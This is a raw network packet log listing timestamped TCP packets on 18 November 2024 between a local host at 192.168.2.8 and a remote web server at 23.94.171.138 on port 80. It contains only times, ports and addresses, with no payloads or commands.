Nov 18, 2024 16:52:56.864025116 CET | 80 | 55648 | 23.94.171.138 | 192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:56.864036083 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:56.864061117 CET5564880192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:56.864077091 CET5564880192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:56.865092039 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:56.912626028 CET5564880192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:56.980071068 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:56.980109930 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:56.980153084 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:56.980176926 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:56.980182886 CET5564880192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:56.980215073 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:56.980226994 CET5564880192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:56.980237961 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:56.980268002 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:56.980276108 CET5564880192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:56.980359077 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:56.980375051 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:56.980391026 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:56.980398893 CET5564880192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:56.980431080 CET5564880192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:56.981143951 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:56.981187105 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:56.981199026 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:56.981231928 CET5564880192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:56.981344938 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:56.981355906 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:56.981396914 CET5564880192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.097002029 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.097052097 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.097064972 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.097100019 CET5564880192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.097131014 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.097146988 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.097173929 CET5564880192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.097206116 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.097218037 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.097256899 CET5564880192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.097805023 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.097852945 CET5564880192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.097872972 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.097884893 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.097934008 CET5564880192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.097965002 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.097976923 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.098015070 CET5564880192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.098336935 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.098382950 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.098395109 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.098422050 CET5564880192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.098465919 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.098504066 CET5564880192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.214236975 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.214303017 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.214323997 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.214337111 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.214351892 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.214436054 CET5564880192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.214474916 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.214489937 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.214530945 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.214533091 CET5564880192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.214595079 CET5564880192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.214621067 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.214632988 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.214689016 CET5564880192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.215132952 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.215204000 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.215218067 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.215264082 CET5564880192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.215305090 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.215334892 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.215349913 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.215359926 CET5564880192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.215403080 CET5564880192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.332263947 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.332283974 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.332298040 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.332385063 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.332398891 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.332415104 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.332487106 CET5564880192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.332506895 CET5564880192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.332506895 CET5564880192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.332732916 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.332786083 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.332801104 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.332829952 CET5564880192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.332968950 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.333028078 CET5564880192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.333040953 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.333054066 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.333091974 CET5564880192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.333334923 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.333403111 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.333416939 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.333437920 CET5564880192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.844851017 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.844862938 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.844887018 CET5564880192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.844913960 CET5564880192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.845002890 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.845046043 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.845051050 CET5564880192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.897032976 CET5564880192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.942456961 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.942503929 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.942517042 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.942565918 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.942578077 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.942588091 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.942595005 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.942662001 CET5564880192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.942688942 CET5564880192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.942960024 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.943010092 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.943033934 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.943054914 CET5564880192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.943073034 CET5564880192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.943146944 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.943159103 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.943170071 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.943195105 CET5564880192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.962033033 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.962075949 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.962094069 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.962176085 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.962177992 CET5564880192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.962188959 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:57.962251902 CET5564880192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:58.004443884 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:58.004462957 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:58.004477024 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:58.004609108 CET5564880192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:58.059710979 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:58.059751987 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:58.059765100 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:58.059858084 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:58.059863091 CET5564880192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:58.059870005 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:58.059880972 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:58.059896946 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:58.059915066 CET5564880192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:58.059951067 CET5564880192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:58.060144901 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:58.060213089 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:58.060225010 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:58.060264111 CET5564880192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:58.060280085 CET5564880192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:58.060430050 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:58.060508013 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:58.060519934 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:58.060550928 CET5564880192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:58.060612917 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:58.060626030 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:58.060652018 CET5564880192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:58.079333067 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:58.079361916 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:58.079375029 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:58.079385996 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:58.079397917 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:58.079410076 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:58.079480886 CET5564880192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:58.079499960 CET5564880192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:58.120891094 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:58.121062040 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:58.121074915 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:58.121139050 CET5564880192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:58.176683903 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:58.176702976 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:58.176716089 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:58.176728964 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:58.176795006 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:58.176809072 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:58.176820040 CET5564880192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:58.176858902 CET5564880192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:58.176858902 CET5564880192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:58.176898956 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:58.176909924 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:58.176922083 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:58.176950932 CET5564880192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:58.177546024 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:58.177587986 CET5564880192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:58.177690029 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:58.177700996 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:58.177735090 CET5564880192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:58.177834988 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:58.177938938 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:58.177949905 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:58.177963018 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:58.177978039 CET5564880192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:58.178004980 CET5564880192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:58.196198940 CET805564823.94.171.138192.168.2.8
Nov 18, 2024 16:52:58.196218967 CET    80       55648    23.94.171.138    192.168.2.8
Nov 18, 2024 16:52:58.196232080 CET    80       55648    23.94.171.138    192.168.2.8
Nov 18, 2024 16:52:58.196317911 CET    55648    80       192.168.2.8      23.94.171.138
Nov 18, 2024 16:52:58.196641922 CET    80       55648    23.94.171.138    192.168.2.8
Nov 18, 2024 16:52:58.196693897 CET    55648    80       192.168.2.8      23.94.171.138
Nov 18, 2024 16:52:58.196702957 CET    80       55648    23.94.171.138    192.168.2.8
Nov 18, 2024 16:52:58.196715117 CET    80       55648    23.94.171.138    192.168.2.8
Nov 18, 2024 16:52:58.196770906 CET    55648    80       192.168.2.8      23.94.171.138
Nov 18, 2024 16:52:58.238739967 CET    80       55648    23.94.171.138    192.168.2.8
Nov 18, 2024 16:52:58.238780022 CET    80       55648    23.94.171.138    192.168.2.8
Nov 18, 2024 16:52:58.238862991 CET    80       55648    23.94.171.138    192.168.2.8
Nov 18, 2024 16:52:58.238884926 CET    55648    80       192.168.2.8      23.94.171.138
Nov 18, 2024 16:52:58.287637949 CET    55648    80       192.168.2.8      23.94.171.138
Nov 18, 2024 16:52:58.293874979 CET    80       55648    23.94.171.138    192.168.2.8
Nov 18, 2024 16:52:58.293905020 CET    80       55648    23.94.171.138    192.168.2.8
Nov 18, 2024 16:52:58.293917894 CET    80       55648    23.94.171.138    192.168.2.8
Nov 18, 2024 16:52:58.293967009 CET    55648    80       192.168.2.8      23.94.171.138
Nov 18, 2024 16:52:58.293992996 CET    80       55648    23.94.171.138    192.168.2.8
Nov 18, 2024 16:52:58.294006109 CET    80       55648    23.94.171.138    192.168.2.8
Nov 18, 2024 16:52:58.294018984 CET    80       55648    23.94.171.138    192.168.2.8
Nov 18, 2024 16:52:58.294030905 CET    55648    80       192.168.2.8      23.94.171.138
Nov 18, 2024 16:52:58.294033051 CET    80       55648    23.94.171.138    192.168.2.8
Nov 18, 2024 16:52:58.294061899 CET    55648    80       192.168.2.8      23.94.171.138
Nov 18, 2024 16:52:58.294178009 CET    80       55648    23.94.171.138    192.168.2.8
Nov 18, 2024 16:52:58.294190884 CET    80       55648    23.94.171.138    192.168.2.8
Nov 18, 2024 16:52:58.294213057 CET    55648    80       192.168.2.8      23.94.171.138
Nov 18, 2024 16:52:58.294692993 CET    80       55648    23.94.171.138    192.168.2.8
Nov 18, 2024 16:52:58.294733047 CET    55648    80       192.168.2.8      23.94.171.138
Nov 18, 2024 16:52:58.294761896 CET    80       55648    23.94.171.138    192.168.2.8
Nov 18, 2024 16:52:58.294774055 CET    80       55648    23.94.171.138    192.168.2.8
Nov 18, 2024 16:52:58.294800043 CET    55648    80       192.168.2.8      23.94.171.138
Nov 18, 2024 16:52:58.294823885 CET    80       55648    23.94.171.138    192.168.2.8
Nov 18, 2024 16:52:58.295200109 CET    80       55648    23.94.171.138    192.168.2.8
Nov 18, 2024 16:52:58.295243025 CET    55648    80       192.168.2.8      23.94.171.138
Nov 18, 2024 16:52:58.295346022 CET    80       55648    23.94.171.138    192.168.2.8
Nov 18, 2024 16:52:58.295358896 CET    80       55648    23.94.171.138    192.168.2.8
Nov 18, 2024 16:52:58.295368910 CET    80       55648    23.94.171.138    192.168.2.8
Nov 18, 2024 16:52:58.295393944 CET    55648    80       192.168.2.8      23.94.171.138
Nov 18, 2024 16:52:58.295418978 CET    80       55648    23.94.171.138    192.168.2.8
Nov 18, 2024 16:52:58.295460939 CET    55648    80       192.168.2.8      23.94.171.138
Nov 18, 2024 16:52:58.313383102 CET    80       55648    23.94.171.138    192.168.2.8
Nov 18, 2024 16:52:58.313414097 CET    80       55648    23.94.171.138    192.168.2.8
Nov 18, 2024 16:52:58.313426971 CET    80       55648    23.94.171.138    192.168.2.8
Nov 18, 2024 16:52:58.313467979 CET    55648    80       192.168.2.8      23.94.171.138
Nov 18, 2024 16:52:58.313546896 CET    80       55648    23.94.171.138    192.168.2.8
Nov 18, 2024 16:52:58.313585997 CET    55648    80       192.168.2.8      23.94.171.138
Nov 18, 2024 16:52:58.313597918 CET    80       55648    23.94.171.138    192.168.2.8
Nov 18, 2024 16:52:58.313611031 CET    80       55648    23.94.171.138    192.168.2.8
Nov 18, 2024 16:52:58.313653946 CET    55648    80       192.168.2.8      23.94.171.138
Nov 18, 2024 16:52:58.355562925 CET    80       55648    23.94.171.138    192.168.2.8
Nov 18, 2024 16:52:58.355580091 CET    80       55648    23.94.171.138    192.168.2.8
Nov 18, 2024 16:52:58.355592966 CET    80       55648    23.94.171.138    192.168.2.8
Nov 18, 2024 16:52:58.355637074 CET    55648    80       192.168.2.8      23.94.171.138
Nov 18, 2024 16:52:58.397198915 CET    55648    80       192.168.2.8      23.94.171.138
Nov 18, 2024 16:52:58.414369106 CET    80       55648    23.94.171.138    192.168.2.8
Nov 18, 2024 16:52:58.414407015 CET    80       55648    23.94.171.138    192.168.2.8
Nov 18, 2024 16:52:58.414421082 CET    80       55648    23.94.171.138    192.168.2.8
Nov 18, 2024 16:52:58.414472103 CET    80       55648    23.94.171.138    192.168.2.8
Nov 18, 2024 16:52:58.414485931 CET    80       55648    23.94.171.138    192.168.2.8
Nov 18, 2024 16:52:58.414532900 CET    55648    80       192.168.2.8      23.94.171.138
Nov 18, 2024 16:52:58.414571047 CET    80       55648    23.94.171.138    192.168.2.8
Nov 18, 2024 16:52:58.414572954 CET    55648    80       192.168.2.8      23.94.171.138
Nov 18, 2024 16:52:58.414582968 CET    80       55648    23.94.171.138    192.168.2.8
Nov 18, 2024 16:52:58.414648056 CET    80       55648    23.94.171.138    192.168.2.8
Nov 18, 2024 16:52:58.414649963 CET    55648    80       192.168.2.8      23.94.171.138
Nov 18, 2024 16:52:58.414702892 CET    55648    80       192.168.2.8      23.94.171.138
Nov 18, 2024 16:52:58.414808035 CET    80       55648    23.94.171.138    192.168.2.8
Nov 18, 2024 16:52:58.414891958 CET    80       55648    23.94.171.138    192.168.2.8
Nov 18, 2024 16:52:58.414904118 CET    80       55648    23.94.171.138    192.168.2.8
Nov 18, 2024 16:52:58.414956093 CET    55648    80       192.168.2.8      23.94.171.138
Nov 18, 2024 16:52:58.415112972 CET    80       55648    23.94.171.138    192.168.2.8
Nov 18, 2024 16:52:58.415162086 CET    55648    80       192.168.2.8      23.94.171.138
Nov 18, 2024 16:52:58.415180922 CET    80       55648    23.94.171.138    192.168.2.8
Nov 18, 2024 16:52:58.415191889 CET    80       55648    23.94.171.138    192.168.2.8
Nov 18, 2024 16:52:58.415273905 CET    55648    80       192.168.2.8      23.94.171.138
Nov 18, 2024 16:52:58.415473938 CET    80       55648    23.94.171.138    192.168.2.8
Nov 18, 2024 16:52:58.415543079 CET    80       55648    23.94.171.138    192.168.2.8
Nov 18, 2024 16:52:58.415553093 CET    80       55648    23.94.171.138    192.168.2.8
Nov 18, 2024 16:52:58.415683985 CET    55648    80       192.168.2.8      23.94.171.138
Nov 18, 2024 16:52:58.431159973 CET    80       55648    23.94.171.138    192.168.2.8
Nov 18, 2024 16:52:58.431179047 CET    80       55648    23.94.171.138    192.168.2.8
Nov 18, 2024 16:52:58.431193113 CET    80       55648    23.94.171.138    192.168.2.8
Nov 18, 2024 16:52:58.431370020 CET    80       55648    23.94.171.138    192.168.2.8
Nov 18, 2024 16:52:58.431382895 CET    80       55648    23.94.171.138    192.168.2.8
Nov 18, 2024 16:52:58.431394100 CET    80       55648    23.94.171.138    192.168.2.8
Nov 18, 2024 16:52:58.431406975 CET    80       55648    23.94.171.138    192.168.2.8
Nov 18, 2024 16:52:58.431415081 CET    55648    80       192.168.2.8      23.94.171.138
Nov 18, 2024 16:52:58.431447029 CET    55648    80       192.168.2.8      23.94.171.138
Nov 18, 2024 16:52:58.431488991 CET    80       55648    23.94.171.138    192.168.2.8
Nov 18, 2024 16:52:58.431529045 CET    55648    80       192.168.2.8      23.94.171.138
Nov 18, 2024 16:52:58.472614050 CET    80       55648    23.94.171.138    192.168.2.8
Nov 18, 2024 16:52:58.472626925 CET    80       55648    23.94.171.138    192.168.2.8
Nov 18, 2024 16:52:58.472639084 CET    80       55648    23.94.171.138    192.168.2.8
Nov 18, 2024 16:52:58.472755909 CET    55648    80       192.168.2.8      23.94.171.138
Nov 18, 2024 16:52:58.531685114 CET    80       55648    23.94.171.138    192.168.2.8
Nov 18, 2024 16:52:58.531713963 CET    80       55648    23.94.171.138    192.168.2.8
Nov 18, 2024 16:52:58.531729937 CET    80       55648    23.94.171.138    192.168.2.8
Nov 18, 2024 16:52:58.531744003 CET    80       55648    23.94.171.138    192.168.2.8
Nov 18, 2024 16:52:58.531757116 CET    80       55648    23.94.171.138    192.168.2.8
Nov 18, 2024 16:52:58.531775951 CET    80       55648    23.94.171.138    192.168.2.8
Nov 18, 2024 16:52:58.531789064 CET    80       55648    23.94.171.138    192.168.2.8
Nov 18, 2024 16:52:58.531867027 CET    55648    80       192.168.2.8      23.94.171.138
Nov 18, 2024 16:52:58.531899929 CET    55648    80       192.168.2.8      23.94.171.138
Nov 18, 2024 16:52:58.532059908 CET    80       55648    23.94.171.138    192.168.2.8
Nov 18, 2024 16:52:58.532115936 CET    55648    80       192.168.2.8      23.94.171.138
Nov 18, 2024 16:52:58.532140970 CET    80       55648    23.94.171.138    192.168.2.8
Nov 18, 2024 16:52:58.532156944 CET    80       55648    23.94.171.138    192.168.2.8
Nov 18, 2024 16:52:58.532217979 CET    55648    80       192.168.2.8      23.94.171.138
